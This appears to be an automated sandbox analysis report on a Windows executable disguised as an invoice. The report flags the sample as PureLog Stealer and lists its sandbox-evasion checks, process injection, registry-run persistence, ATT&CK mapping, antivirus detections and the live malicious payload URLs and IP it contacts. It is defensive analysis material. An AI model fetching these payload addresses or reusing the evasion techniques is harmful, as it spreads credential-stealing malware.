                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe TID: 2992Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe TID: 4984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe TID: 3172Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 1520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 6776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 7032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 6768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038331719.000001C10CEA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV[6P
                      Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: invoices---DEC_2023.exe, 00000002.00000002.3249926425.000001EEE8D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltureOF
                      Source: fikk.exe, 00000003.00000002.2197305779.000002A4C62E5000.00000004.00000020.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2278103305.000001D907A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeMemory written: C:\Users\user\Desktop\invoices---DEC_2023.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeMemory written: C:\Users\user\AppData\Roaming\fikk.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeMemory written: C:\Users\user\AppData\Roaming\fikk.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeThread register set: target process: 748Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread register set: target process: 1976Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeThread register set: target process: 3812Jump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exeJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeQueries volume information: C:\Users\user\Desktop\invoices---DEC_2023.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeQueries volume information: C:\Users\user\Desktop\invoices---DEC_2023.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeQueries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeQueries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeQueries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeQueries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: invoices---DEC_2023.exe PID: 2148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 4448, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 3372, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: invoices---DEC_2023.exe PID: 2148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 4448, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fikk.exe PID: 3372, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                      Valid Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		211
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping21
                      Security Software Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                      Default AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		1
                      Disable or Modify Tools                      		LSASS Memory21
                      Virtualization/Sandbox Evasion                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port                      		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                      Domain AccountsAtLogon Script (Windows)1
                      Registry Run Keys / Startup Folder                      		21
                      Virtualization/Sandbox Evasion                      		Security Account Manager12
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Ingress Tool Transfer                      		Data Encrypted for ImpactDNS ServerEmail Addresses
                      Local AccountsCronLogin HookLogin Hook211
                      Process Injection                      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication1
                      Non-Application Layer Protocol                      		Data DestructionVirtual Private ServerEmployee Names
                      Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer1
                      Application Layer Protocol                      		Data Encrypted for ImpactServerGather Victim Network Information
                      Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                      External Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      invoices---DEC_2023.exe19%ReversingLabsByteCode-MSIL.Trojan.Generic
                      invoices---DEC_2023.exe38%VirustotalBrowse
                      invoices---DEC_2023.exe100%AviraHEUR/AGEN.1360909
                      invoices---DEC_2023.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\fikk.exe100%AviraHEUR/AGEN.1360909
                      C:\Users\user\AppData\Roaming\fikk.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\fikk.exe19%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\AppData\Roaming\fikk.exe38%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://45.137.22.163/Wowoqku.wav100%Avira URL Cloudmalware
                      http://127.0.0.1:0%Avira URL Cloudsafe
                      http://45.137.22.163100%Avira URL Cloudmalware
                      http://45.137.22.163/Wowoqku.wav12%VirustotalBrowse
                      http://45.137.22.16313%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://45.137.22.163/Wowoqku.wavfalse
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netinvoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://127.0.0.1:invoices---DEC_2023.exe, fikk.exe.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://45.137.22.163invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 13%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://github.com/mgravell/protobuf-netiinvoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJinvoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2204458886.000002A4DC281000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2283674148.000001D91DB11000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameinvoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/11564914/23354;invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/2152978/23354invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    45.137.22.163
                                    		unknownNetherlands
                                    		51447ROOTLAYERNETNLfalse
                                    5.252.165.214
                                    		unknownUnited States
                                    		64271RIXCLOUD-INCUSfalse

                                    General Information

                                    Joe Sandbox version:38.0.0 Ammolite
                                    Analysis ID:1364951
                                    Start date and time:2023-12-20 09:12:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 54s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:invoices---DEC_2023.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@9/4@0/2
                                    EGA Information:
                                    • Successful, ratio: 16.7%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target fikk.exe, PID 1976 because it is empty
                                    • Execution Graph export aborted for target fikk.exe, PID 3372 because it is empty
                                    • Execution Graph export aborted for target fikk.exe, PID 4448 because it is empty
                                    • Execution Graph export aborted for target invoices---DEC_2023.exe, PID 2148 because it is empty
                                    • Execution Graph export aborted for target invoices---DEC_2023.exe, PID 748 because it is empty
                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:12:56API Interceptor1x Sleep call for process: invoices---DEC_2023.exe modified
                                    09:12:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fikk C:\Users\user\AppData\Roaming\fikk.exe
                                    09:13:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fikk C:\Users\user\AppData\Roaming\fikk.exe
                                    09:13:12API Interceptor1x Sleep call for process: fikk.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    45.137.22.163Sysiq.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 45.137.22.163/Sluhmuv.mp3
                                    NEW_ORDER_12-18-23.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 45.137.22.163/Akoob.pdf
                                    SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 45.137.22.163/hiii.pdf
                                    Controllo saldo 30% Ordine 5667.exeGet hashmaliciousAgentTeslaBrowse
                                    • 45.137.22.163/bless_Jkvszuhw.png
                                    Quotation-pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                    • 45.137.22.163/Toscgshw_Yvmodcuo.png
                                    #Uc8fc#Ubb38 30% #Uc794#Uc561 #Ud655#Uc778.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/orderfile_Hecqxfqw.png
                                    New order _xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/New_order__xls_Ivuuoipf.bmp
                                    SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/fact_Sptqaevl.bmp
                                    order confirmation 46574 -QT-04-0022.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg
                                    Quotation-pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                    • 45.137.22.163/Kwcmalox_Bcqlnfnp.jpg
                                    2467864 _INV_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 45.137.22.163/Hebvr_Lwvvdxxi.bmp
                                    conferma d'ordine 46574.exeGet hashmaliciousSnake KeyloggerBrowse
